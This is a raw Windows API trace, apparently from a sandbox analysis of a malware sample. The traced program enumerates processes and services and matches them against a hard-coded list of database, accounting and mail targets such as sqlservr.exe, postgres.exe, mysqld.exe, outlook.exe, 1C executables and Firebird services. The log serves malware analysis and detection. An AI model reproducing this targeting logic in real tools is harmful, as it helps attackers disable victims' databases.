lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0267.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0267.115] lstrlenW (lpString="TrkWks") returned 6 [0267.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0267.115] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0267.115] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0267.115] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0267.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0267.115] lstrlenW (lpString="UxSms") returned 5 [0267.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0267.115] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0267.115] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0267.115] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0267.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0267.115] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0267.115] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x354 [0267.116] Process32FirstW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.116] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0267.117] lstrlenW (lpString="System") returned 6 [0267.117] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0267.117] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0267.117] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0267.117] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0267.117] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0267.117] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0267.117] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0267.117] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0267.117] lstrlenW (lpString="smss.exe") returned 8 [0267.117] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0267.117] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0267.117] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0267.117] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0267.117] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0267.117] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0267.117] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0267.117] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0267.118] lstrlenW (lpString="csrss.exe") returned 9 [0267.118] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0267.118] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0267.118] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0267.118] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0267.118] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0267.118] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0267.118] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0267.118] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0267.118] lstrlenW (lpString="wininit.exe") returned 11 [0267.118] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0267.118] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0267.118] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0267.118] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0267.118] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0267.118] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0267.118] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0267.118] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0267.118] lstrlenW (lpString="csrss.exe") returned 9 [0267.119] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0267.119] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0267.119] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0267.119] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0267.119] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0267.119] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0267.119] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0267.119] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0267.119] lstrlenW (lpString="winlogon.exe") returned 12 [0267.119] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0267.119] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0267.119] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0267.119] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0267.119] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0267.119] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0267.119] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0267.119] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0267.120] lstrlenW (lpString="services.exe") returned 12 [0267.120] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0267.120] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0267.120] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0267.120] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0267.120] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0267.120] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0267.120] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0267.120] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0267.120] lstrlenW (lpString="lsass.exe") returned 9 [0267.120] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0267.120] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0267.120] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0267.120] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0267.120] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0267.120] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0267.120] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0267.120] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0267.121] lstrlenW (lpString="lsm.exe") returned 7 [0267.121] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0267.121] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0267.121] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0267.121] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0267.121] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0267.121] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0267.121] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0267.121] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.121] lstrlenW (lpString="svchost.exe") returned 11 [0267.121] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.121] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.121] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.121] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.121] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.121] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.121] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.121] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.122] lstrlenW (lpString="svchost.exe") returned 11 [0267.122] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.122] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.122] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.122] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.122] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.122] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.122] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.122] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.122] lstrlenW (lpString="svchost.exe") returned 11 [0267.122] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.122] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.122] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.122] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.122] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.122] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.122] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.122] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.122] lstrlenW (lpString="svchost.exe") returned 11 [0267.123] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.123] lstrlenW (lpString="svchost.exe") returned 11 [0267.123] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0267.123] lstrlenW (lpString="audiodg.exe") returned 11 [0267.123] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.123] lstrlenW (lpString="svchost.exe") returned 11 [0267.123] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.124] lstrlenW (lpString="svchost.exe") returned 11 [0267.124] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0267.124] lstrlenW (lpString="userinit.exe") returned 12 [0267.124] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0267.124] lstrlenW (lpString="dwm.exe") returned 7 [0267.124] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0267.124] lstrlenW (lpString="explorer.exe") returned 12 [0267.125] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0267.125] lstrlenW (lpString="spoolsv.exe") returned 11 [0267.125] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0267.125] lstrlenW (lpString="taskhost.exe") returned 12 [0267.125] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.125] lstrlenW (lpString="svchost.exe") returned 11 [0267.125] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0267.126] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0267.126] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0267.126] lstrlenW (lpString="reader_sl.exe") returned 13 [0267.126] Process32NextW (in: hSnapshot=0x354, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0267.126] CloseHandle (hObject=0x354) returned 1 [0267.126] Sleep (dwMilliseconds=0x1f4) [0267.869] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea308 [0267.924] EnumServicesStatusExW (in: hSCManager=0x47ea308, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0267.925] GetLastError () returned 0xea [0267.925] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xd68) returned 0x3dec5a0 [0267.925] EnumServicesStatusExW (in: hSCManager=0x47ea308, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xd68, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0267.925] CloseServiceHandle (hSCObject=0x47ea308) returned 1 [0267.925] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0267.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0267.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0267.925] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0267.925] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0267.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0267.925] lstrlenW (lpString="AudioSrv") returned 8 [0267.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0267.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0267.925] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0267.925] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0267.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0267.925] lstrlenW (lpString="BFE") returned 3 [0267.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0267.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0267.926] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0267.926] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0267.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0267.926] lstrlenW (lpString="CryptSvc") returned 8 [0267.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0267.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0267.926] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0267.926] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0267.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0267.926] lstrlenW (lpString="CscService") returned 10 [0267.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0267.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0267.926] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0267.926] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0267.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0267.926] lstrlenW (lpString="DcomLaunch") returned 10 [0267.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0267.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0267.926] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0267.926] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0267.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0267.926] lstrlenW (lpString="Dhcp") returned 4 [0267.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0267.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0267.926] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0267.926] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0267.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0267.926] lstrlenW (lpString="Dnscache") returned 8 [0267.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0267.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0267.926] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0267.926] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0267.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0267.927] lstrlenW (lpString="DPS") returned 3 [0267.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0267.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0267.927] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0267.927] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0267.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0267.927] lstrlenW (lpString="eventlog") returned 8 [0267.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0267.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0267.927] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0267.927] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0267.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0267.927] lstrlenW (lpString="EventSystem") returned 11 [0267.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0267.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0267.927] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0267.927] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0267.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0267.927] lstrlenW (lpString="gpsvc") returned 5 [0267.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0267.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0267.927] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0267.927] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0267.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0267.927] lstrlenW (lpString="LanmanWorkstation") returned 17 [0267.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0267.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0267.927] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0267.927] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0267.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0267.927] lstrlenW (lpString="lmhosts") returned 7 [0267.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0267.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0267.928] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0267.928] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0267.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0267.928] lstrlenW (lpString="MMCSS") returned 5 [0267.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0267.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0267.928] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0267.928] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0267.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0267.928] lstrlenW (lpString="MpsSvc") returned 6 [0267.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0267.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0267.928] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0267.928] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0267.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0267.928] lstrlenW (lpString="NlaSvc") returned 6 